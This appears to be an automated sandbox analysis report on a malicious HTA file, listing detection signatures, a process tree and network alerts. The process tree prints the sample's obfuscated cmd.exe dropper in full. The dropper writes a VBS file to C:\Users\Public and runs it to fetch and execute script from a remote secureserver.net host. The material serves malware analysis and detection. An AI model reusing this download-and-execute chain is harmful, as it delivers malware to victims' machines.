Edit tour
Windows
Analysis Report
Archivo-PxFkiLTWYG-23122024095010.hta
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
Command shell drops VBS files
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64native
- mshta.exe (PID: 6236 cmdline:
mshta.exe "C:\Users\ user\Deskt op\Archivo -PxFkiLTWY G-23122024 095010.hta " MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 7636 cmdline:
"C:\Window s\System32 \cmd.exe" /k echo|se t /p=^"OBF rHQ=".":VX FexowpWNDX fHzvyUCKhL ="i":wXWkN nKwYZxgLlP ej=":":eHy bBjF="g":G etO">C:\Us ers\Public \cNOV.vbs& echo|set / p=^"bject( "scr"+VXFe xowpWNDXfH zvyUCKhL+" pt"+wXWkNn KwYZxgLlPe j+"hT"+"Tp s"+wXWkNnK wYZxgLlPej +"//102"+O BFrHQ+"57" +OBFrHQ+"2 05"+OBFrHQ +"92"+OBFr HQ+"host"+ OBFrHQ+"se cureserver "+OBFrHQ+" net//"+eHy bBjF+"1")" >>C:\Users \Public\cN OV.vbs&c:\ windows\sy stem32\cmd .exe /c st art C:\Use rs\Public\ cNOV.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 4448 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 596 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" se t /p="OBFr HQ=".":VXF exowpWNDXf HzvyUCKhL= "i":wXWkNn KwYZxgLlPe j=":":eHyb BjF="g":Ge tO">C:\Use rs\Public\ cNOV.vbs&e cho|set /p =^"bject(" scr"+VXFex owpWNDXfHz vyUCKhL+"p t"+wXWkNnK wYZxgLlPej +"hT"+"Tps "+wXWkNnKw YZxgLlPej+ "//102"+OB FrHQ+"57"+ OBFrHQ+"20 5"+OBFrHQ+ "92"+OBFrH Q+"host"+O BFrHQ+"sec ureserver" +OBFrHQ+"n et//"+eHyb BjF+"1")"> >C:\Users\ Public\cNO V.vbs&c:\w indows\sys tem32\cmd. exe /c sta rt C:\User s\Public\c NOV.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 7544 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 6928 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" se t /p="bjec t("scr"+VX FexowpWNDX fHzvyUCKhL +"pt"+wXWk NnKwYZxgLl Pej+"hT"+" Tps"+wXWkN nKwYZxgLlP ej+"//102" +OBFrHQ+"5 7"+OBFrHQ+ "205"+OBFr HQ+"92"+OB FrHQ+"host "+OBFrHQ+" secureserv er"+OBFrHQ +"net//"+e HybBjF+"1" )">>C:\Use rs\Public\ cNOV.vbs&c :\windows\ system32\c md.exe /c start C:\U sers\Publi c\cNOV.vbs " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 6464 cmdline:
c:\windows \system32\ cmd.exe /c start C:\ Users\Publ ic\cNOV.vb s MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - wscript.exe (PID: 5388 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \cNOV.vbs" MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Michael Haag: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-23T10:48:57.194882+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.11.20 | 49758 | 52.95.165.10 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |